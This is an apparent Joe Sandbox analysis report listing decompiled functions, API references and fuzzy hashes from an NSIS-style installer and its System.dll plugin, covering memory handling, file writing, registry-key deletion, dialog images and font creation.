Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
Instruction ID: eb17ebabde20c32bd565f0ca98bf5c3c7f8a04474e671541d9d17dad0456e96b
Opcode Fuzzy Hash: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
Instruction Fuzzy Hash: 20014B7064020DABEF209F60DE4AFEA3B79FB04345F008039FA06B51D0DBB999559F69

Uniqueness

Uniqueness Score: -1.00%

Function 6C772655 Relevance: 9.1, APIs: 6, Instructions: 109
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E6C772655() {
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t27;
				signed int _t39;
				void* _t40;
				void* _t43;
				intOrPtr _t44;
				void* _t45;

				_t40 = E6C7712BB();
				_t24 =  *((intOrPtr*)(_t45 + 0x18));
				_t44 =  *((intOrPtr*)(_t24 + 0x1014));
				_t43 = (_t44 + 0x81 << 5) + _t24;
				do {
					if( *((intOrPtr*)(_t43 - 4)) >= 0) {
					}
					_t39 =  *(_t43 - 8) & 0x000000ff;
					if(_t39 <= 7) {
						switch( *((intOrPtr*)(_t39 * 4 +  &M6C772784))) {
							case 0:
								 *_t40 = 0;
								goto L17;
							case 1:
								__eax =  *__eax;
								if(__ecx > __ebx) {
									 *(__esp + 0x10) = __ecx;
									__ecx =  *(0x6c77407c + __edx * 4);
									__edx =  *(__esp + 0x10);
									__ecx = __ecx * __edx;
									asm("sbb edx, edx");
									__edx = __edx & __ecx;
									__eax = __eax &  *(0x6c77409c + __edx * 4);
								}
								_push(__eax);
								goto L15;
							case 2:
								__eax = E6C771510(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L16;
							case 3:
								__ecx =  *0x6c77506c;
								__edx = __ecx - 1;
								__eax = MultiByteToWideChar(__ebx, __ebx,  *__eax, __ecx, __edi, __edx);
								__eax =  *0x6c77506c;
								 *((short*)(__edi + __eax * 2 - 2)) = __bx;
								goto L17;
							case 4:
								__eax = lstrcpynW(__edi,  *__eax,  *0x6c77506c);
								goto L17;
							case 5:
								_push( *0x6c77506c);
								_push(__edi);
								_push( *__eax);
								__imp__StringFromGUID2();
								goto L17;
							case 6:
								_push( *__esi);
								L15:
								__eax = wsprintfW(__edi, 0x6c775000);
								L16:
								__esp = __esp + 0xc;
								goto L17;
						}
					}
					L17:
					_t26 =  *(_t43 + 0x14);
					if(_t26 != 0 && ( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x18)))) != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
						GlobalFree(_t26);
					}
					_t27 =  *((intOrPtr*)(_t43 + 0xc));
					if(_t27 != 0) {
						if(_t27 != 0xffffffff) {
							if(_t27 > 0) {
								E6C771381(_t27 - 1, _t40);
								goto L26;
							}
						} else {
							E6C771312(_t40);
							L26:
						}
					}
					_t44 = _t44 - 1;
					_t43 = _t43 - 0x20;
				} while (_t44 >= 0);
				return GlobalFree(_t40);
			}

0x6c77265f
0x6c772661
0x6c772665
0x6c772674
0x6c772678
0x6c77267d
0x6c77267d
0x6c772685
0x6c77268c
0x6c772692
0x00000000
0x6c772699
0x00000000
0x00000000
0x6c7726a1
0x6c7726a5
0x6c7726a8
0x6c7726ac
0x6c7726b3
0x6c7726b7
0x6c7726bd
0x6c7726bf
0x6c7726c1
0x6c7726c1
0x6c7726c8
0x00000000
0x00000000
0x6c7726d1
0x00000000
0x00000000
0x6c7726d8
0x6c7726de
0x6c7726e8
0x6c7726ee
0x6c7726f3
0x00000000
0x00000000
0x6c772714
0x00000000
0x00000000
0x6c7726fa
0x6c772700
0x6c772701
0x6c772703
0x00000000
0x00000000
0x6c77271c
0x6c77271e
0x6c772724
0x6c77272a
0x6c77272a
0x00000000
0x00000000
0x6c772692
0x6c77272d
0x6c77272d
0x6c772732
0x6c772743
0x6c772743
0x6c772749
0x6c77274e
0x6c772753
0x6c77275f
0x6c772764
0x00000000
0x6c772769
0x6c772755
0x6c772756
0x6c77276a
0x6c77276a
0x6c772753
0x6c77276b
0x6c77276c
0x6c77276f
0x6c772783

APIs

Part of subcall function 6C7712BB: GlobalAlloc.KERNEL32(00000040,?,6C7712DB,?,6C77137F,00000019,6C7711CA,-000000A0), ref: 6C7712C5

GlobalFree.KERNEL32(?), ref: 6C772743
GlobalFree.KERNEL32(00000000), ref: 6C772778

Memory Dump Source

Source File: 0000000B.00000002.1053928875.000000006C771000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C770000, based on PE: true

Associated: 0000000B.00000002.1053905102.000000006C770000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.1053982527.000000006C774000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.1054013557.000000006C776000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6c770000_wqs.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: f944f7f2268cf2dbe0ed22efa8b92517e07b00285752873aad5d3327a7bee0a8
Instruction ID: 932e2389af2a7919011e66bb6149cb23c502c5f602213493b7fc7b40181d5e33
Opcode Fuzzy Hash: f944f7f2268cf2dbe0ed22efa8b92517e07b00285752873aad5d3327a7bee0a8
Instruction Fuzzy Hash: 60318C71604119DBCF268F64DBDCC6A77B6EB863487144579E22182A20C739A805DBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00402950(int __ebx, void* __eflags) {
				WCHAR* _t26;
				void* _t29;
				long _t37;
				int _t49;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t49 = __ebx;
				_t52 = 0xfffffd66;
				_t26 = E00402DA6(0xfffffff0);
				_t55 = _t26;
				 *(_t61 - 0x40) = _t26;
				if(E00405E83(_t26) == 0) {
					E00402DA6(0xffffffed);
				}
				E00406008(_t55);
				_t29 = E0040602D(_t55, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
					if( *(_t61 - 0x28) != _t49) {
						_t37 =  *0x434f14;
						 *(_t61 - 0x44) = _t37;
						_t54 = GlobalAlloc(0x40, _t37);
						if(_t54 != _t49) {
							E004034E5(_t49);
							E004034CF(_t54,  *(_t61 - 0x44));
							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
							 *(_t61 - 0x10) = _t59;
							if(_t59 != _t49) {
								E004032B4( *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
								while( *_t59 != _t49) {
									_t60 = _t59 + 8;
									 *(_t61 - 0x3c) =  *_t59;
									E00405FE8( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
									_t59 = _t60 +  *(_t61 - 0x3c);
								}
								GlobalFree( *(_t61 - 0x10));
							}
							E004060DF( *(_t61 + 8), _t54,  *(_t61 - 0x44));
							GlobalFree(_t54);
							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
						}
					}
					_t52 = E004032B4( *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
					CloseHandle( *(_t61 + 8));
				}
				_t56 = 0xfffffff3;
				if(_t52 < _t49) {
					_t56 = 0xffffffef;
					DeleteFileW( *(_t61 - 0x40));
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t56);
				E00401423();
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
GlobalFree.KERNEL32(?), ref: 00402A06
GlobalFree.KERNEL32(00000000), ref: 00402A19
CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
Instruction ID: 8fc1a79e9ee36ebd610a2d663d7387b5f1fea8f48d7bc9e01940cd119f3fb53c
Opcode Fuzzy Hash: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
Instruction Fuzzy Hash: 5831C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E0CB794C429BA8

Uniqueness

Uniqueness Score: -1.00%

Function 6C772480 Relevance: 7.6, APIs: 5, Instructions: 135
memoryCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E6C772480(void* __edx) {
				void* _t37;
				signed int _t38;
				void* _t39;
				void* _t41;
				signed char* _t42;
				signed char* _t51;
				void* _t52;
				void* _t54;

				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
				while(1) {
					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
					_t52 = _t51[0x18];
					if(_t52 == 0) {
						goto L9;
					}
					_t41 = 0x1a;
					if(_t52 == _t41) {
						goto L9;
					}
					if(_t52 != 0xffffffff) {
						if(_t52 <= 0 || _t52 > 0x19) {
							_t51[0x18] = _t41;
							goto L12;
						} else {
							_t37 = E6C77135A(_t52 - 1);
							L10:
							goto L11;
						}
					} else {
						_t37 = E6C7712E3();
						L11:
						_t52 = _t37;
						L12:
						_t13 =  &(_t51[8]); // 0x1020
						_t42 = _t13;
						if(_t51[4] >= 0) {
						}
						_t38 =  *_t51 & 0x000000ff;
						_t51[0x1c] = 0;
						if(_t38 > 7) {
							L27:
							_t39 = GlobalFree(_t52);
							if( *(_t54 + 0x10) == 0) {
								return _t39;
							}
							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
							} else {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t38 * 4 +  &M6C7725F8))) {
								case 0:
									 *_t42 = 0;
									goto L27;
								case 1:
									__eax = E6C7713B1(__ebp);
									goto L21;
								case 2:
									 *__edi = E6C7713B1(__ebp);
									__edi[1] = __edx;
									goto L27;
								case 3:
									__eax = GlobalAlloc(0x40,  *0x6c77506c);
									 *(__esi + 0x1c) = __eax;
									__edx = 0;
									 *__edi = __eax;
									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x6c77506c, __eax,  *0x6c77506c, 0, 0);
									goto L27;
								case 4:
									__eax = E6C7712CC(__ebp);
									 *(__esi + 0x1c) = __eax;
									L21:
									 *__edi = __eax;
									goto L27;
								case 5:
									__eax = GlobalAlloc(0x40, 0x10);
									_push(__eax);
									 *(__esi + 0x1c) = __eax;
									_push(__ebp);
									 *__edi = __eax;
									__imp__CLSIDFromString();
									goto L27;
								case 6:
									if( *__ebp != __cx) {
										__eax = E6C7713B1(__ebp);
										 *__ebx = __eax;
									}
									goto L27;
								case 7:
									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
									( *(__esi + 0x18) - 1) *  *0x6c77506c =  *0x6c775074 + ( *(__esi + 0x18) - 1) *  *0x6c77506c * 2 + 0x18;
									 *__ebx =  *0x6c775074 + ( *(__esi + 0x18) - 1) *  *0x6c77506c * 2 + 0x18;
									asm("cdq");
									__eax = E6C771510(__edx,  *0x6c775074 + ( *(__esi + 0x18) - 1) *  *0x6c77506c * 2 + 0x18, __edx,  *0x6c775074 + ( *(__esi + 0x18) - 1) *  *0x6c77506c * 2);
									goto L27;
							}
						}
					}
					L9:
					_t37 = E6C7712CC(0x6c775044);
					goto L10;
				}
			}

0x6c772494
0x6c772498
0x6c7724a3
0x6c7724a3
0x6c7724aa
0x6c7724af
0x00000000
0x00000000
0x6c7724b3
0x6c7724b6
0x00000000
0x00000000
0x6c7724bb
0x6c7724c6
0x6c7724d6
0x00000000
0x6c7724cd
0x6c7724cf
0x6c7724e5
0x00000000
0x6c7724e5
0x6c7724bd
0x6c7724bd
0x6c7724e6
0x6c7724e6
0x6c7724e8
0x6c7724ec
0x6c7724ec
0x6c7724ef
0x6c7724ef
0x6c7724f7
0x6c7724ff
0x6c772502
0x6c7725c1
0x6c7725c2
0x6c7725cd
0x6c7725f7
0x6c7725f7
0x6c7725dd
0x6c7725e9
0x6c7725df
0x6c7725df
0x6c7725df
0x00000000
0x6c772508
0x6c772508
0x00000000
0x6c77250f
0x00000000
0x00000000
0x6c772517
0x00000000
0x00000000
0x6c772525
0x6c772527
0x00000000
0x00000000
0x6c772548
0x6c77254e
0x6c772551
0x6c772553
0x6c772563
0x00000000
0x00000000
0x6c772530
0x6c772535
0x6c772538
0x6c772539
0x00000000
0x00000000
0x6c77256f
0x6c772575
0x6c772576
0x6c772579
0x6c77257a
0x6c77257c
0x00000000
0x00000000
0x6c772588
0x6c77258b
0x6c772597
0x6c772599
0x00000000
0x00000000
0x6c7725a5
0x6c7725b1
0x6c7725b4
0x6c7725b6
0x6c7725b9
0x00000000
0x00000000
0x6c772508
0x6c772502
0x6c7724db
0x6c7724e0
0x00000000
0x6c7724e0

APIs

GlobalFree.KERNEL32(00000000), ref: 6C7725C2

Part of subcall function 6C7712CC: lstrcpynW.KERNEL32(00000000,?,6C77137F,00000019,6C7711CA,-000000A0), ref: 6C7712DC

GlobalAlloc.KERNEL32(00000040), ref: 6C772548
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6C772563

Memory Dump Source

Source File: 0000000B.00000002.1053928875.000000006C771000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C770000, based on PE: true

Associated: 0000000B.00000002.1053905102.000000006C770000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.1053982527.000000006C774000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.1054013557.000000006C776000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6c770000_wqs.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID:
API String ID: 4216380887-0
Opcode ID: f2244ba35cab39ca48b17ac826d089433737257a2ee557f0efca33c7eccb4f1a
Instruction ID: ff0faeb7bf81e48027851d21e43d7f801008d30c4aa5ba21040c45e5c99a252c
Opcode Fuzzy Hash: f2244ba35cab39ca48b17ac826d089433737257a2ee557f0efca33c7eccb4f1a
Instruction Fuzzy Hash: F541E2B060830DEFDF34DF28DA5CA6677B8FB45304F10896DE56686A90E7309954CB71

Uniqueness

Uniqueness Score: -1.00%

Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84
registryCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004063AA(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E0040690A(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}

APIs

RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
Instruction ID: ca6229ec891c5908b4c2d3bab14ae3db7b9396451d72a40731f1c02386a45f13
Opcode Fuzzy Hash: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
Instruction Fuzzy Hash: DA215A7150010ABBEF119F90CE89EEF7B7DEB50384F100076F909B21A0D7B49E54AA68

Uniqueness

Uniqueness Score: -1.00%

Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00401D81(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				WCHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t60;
				long _t63;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
				} else {
					E00402D84(2);
					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
				}
				_t55 =  *(_t65 - 0x24);
				 *(_t65 + 8) = _t30;
				_t60 = _t55 & 0x00000004;
				 *(_t65 - 0x38) = _t55 & 0x00000003;
				 *(_t65 - 0x18) = _t55 >> 0x1f;
				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
				} else {
					_t38 = E00402DA6(0x11);
				}
				 *(_t65 - 0x44) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x60);
				asm("sbb esi, esi");
				_t63 = LoadImageW( ~_t60 &  *0x434f00,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
					_push(_t63);
					E00406484();
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}

APIs

GetDlgItem.USER32(?,?), ref: 00401D9A
GetClientRect.USER32(?,?), ref: 00401DE5
LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
DeleteObject.GDI32(00000000), ref: 00401E39

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
Instruction ID: b69f8f45c5cbb28dd5603d9b1d667d2ce3d3910c133b75fee4ecc707c572ca23
Opcode Fuzzy Hash: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
Instruction Fuzzy Hash: 3321F672904119AFCB05DBA4DE45AEEBBB5EF08314F14003AFA45F62A0DB389951DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D84(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x40cdf0->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x40ce00 = E00402D84(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x20));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x40ce07 = 1;
				 *0x40ce04 = _t15 & 0x00000001;
				 *0x40ce05 = _t15 & 0x00000002;
				 *0x40ce06 = _t15 & 0x00000004;
				E0040657A(_t9, _t31, _t33, 0x40ce0c,  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x40cdf0);
				_push(_t18);
				_push(_t31);
				E00406484();
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

APIs

GetDC.USER32(?), ref: 00401E51
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
ReleaseDC.USER32(?,00000000), ref: 00401E84

Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsf8786.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsf8786.tmp\System.dll,00000000), ref: 00406779

CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED3

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
String ID:
API String ID: 2584051700-0
Opcode ID: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
Instruction ID: 78b13ae86a0973dc2b43aa2eb6c1af0beb3c1ef463c522f55250376beecb9f8a
Opcode Fuzzy Hash: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
Instruction Fuzzy Hash: 7001B571904241EFEB005BB0EE49B9A3FB4BB15301F108A39F541B71D2C7B904458BED

Uniqueness

Uniqueness Score: -1.00%

Function 6C7716BD Relevance: 7.5, APIs: 5, Instructions: 41
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6C7716BD(struct HINSTANCE__* _a4, short* _a8) {
				_Unknown_base(*)()* _t7;
				void* _t10;
				int _t14;

				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
				_t10 = GlobalAlloc(0x40, _t14);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
				_t7 = GetProcAddress(_a4, _t10);
				GlobalFree(_t10);
				return _t7;
			}

0x6c7716d7
0x6c7716e3
0x6c7716f0
0x6c7716f7
0x6c771700
0x6c77170c

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6C7722D8,?,00000808), ref: 6C7716D5
GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6C7722D8,?,00000808), ref: 6C7716DC
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6C7722D8,?,00000808), ref: 6C7716F0
GetProcAddress.KERNEL32(6C7722D8,00000000), ref: 6C7716F7
GlobalFree.KERNEL32(00000000), ref: 6C771700

Memory Dump Source

Source File: 0000000B.00000002.1053928875.000000006C771000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C770000, based on PE: true

Associated: 0000000B.00000002.1053905102.000000006C770000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.1053982527.000000006C774000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.1054013557.000000006C776000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6c770000_wqs.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
